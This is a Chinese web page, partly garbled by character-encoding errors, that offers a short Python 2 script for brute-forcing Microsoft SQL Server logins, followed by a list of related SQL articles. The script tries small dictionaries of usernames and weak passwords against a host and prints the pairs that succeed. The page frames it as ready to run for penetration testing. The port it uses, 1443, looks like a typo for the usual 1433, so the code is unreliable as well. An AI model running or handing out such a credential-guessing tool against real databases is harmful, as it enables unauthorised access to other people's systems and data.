Mssql Python版本爆破小腳本，需要安裝 MSSQL-python.exe 可以看出代碼量很少，用法：保存代碼為MssqlDatabaseBlasting.py，cmd切換到 MssqlDatabaseBlasting.py路徑下，并執(zhí)行 MssqlDatabaseBlasting.py即可開始破解

import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密碼字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#賬號字典

success = False
host = "127.0.0.1"#數(shù)據(jù)庫IP地址
port = 1443
for username in mssql_username:
  for password in common_weak_password:
    try:
      db = pymssql.connect(server=host, port=port, user=username, password=password)
      success = True
      if success:
        print username, password
    except Exception, e:
      pass

說明：看到很多網(wǎng)絡(luò)安全愛好者，在進(jìn)行滲透測試的時候，遇到數(shù)據(jù)庫可以遠(yuǎn)程管理，但是無法破解其賬號密碼，所以此篇文章就推送幾個腳本進(jìn)行滲透。

您可能感興趣的文章:

相關(guān)文章

如何創(chuàng)建SQL Server 2000故障轉(zhuǎn)移群集
如何創(chuàng)建SQL Server 2000故障轉(zhuǎn)移群集...
2007-01-01
深入淺析SQL中的group by 和 having 用法
這篇文章主要介紹了SQL中的group by 和 having 用法淺析，需要的的朋友參考下吧
2017-08-08
sqlserver數(shù)據(jù)庫最大Id沖突問題解決方法之一
在一個特定的表中保存最大Id,通過記錄來取每次的唯一最大值
2011-12-12
SQL Server使用row_number分頁的實現(xiàn)方法
這篇文章主要為大家詳細(xì)介紹了SQL Server使用row_number分頁的實現(xiàn)方法，具有一定的參考價值，感興趣的朋友可以參考一下
2016-06-06
被遺忘的SQLServer比較運算符謂詞
SQLServer中有三個關(guān)鍵字可以修改比較運算符：All、Any和Some，其中Some和Any等價。
2009-08-08
SQL注入之報錯注入的具體使用
報錯注入就是利用了數(shù)據(jù)庫的某些機制,人為地制造錯誤條件,使得查詢結(jié)果能夠出現(xiàn)在錯誤信息中,主要介紹了SQL注入之報錯注入的具體使用,感興趣的可以了解一下
2023-08-08
SQL Server索引超出了數(shù)組界限的解決方案
這篇文章主要介紹了SQL Server索引超出了數(shù)組界限的解決方案，具有很好的參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2021-03-03
sqlserver中根據(jù)字符分割字符串的最好的寫法分享
因數(shù)據(jù)庫中保存的是以,號分隔的數(shù)據(jù)，需要在界面上以表格的方式顯示出來。特想出以下方法
2012-05-05
sqlserver 多表查詢不同數(shù)據(jù)庫服務(wù)器上的表
sqlserver中多表查詢不同數(shù)據(jù)庫服務(wù)器上的表的實現(xiàn)方法，需要的朋友可以參考下
2012-04-04
過程需要參數(shù) ''@statement'' 為 ''ntext/nchar/nvarchar'' 類型
過程需要參數(shù)
2009-04-04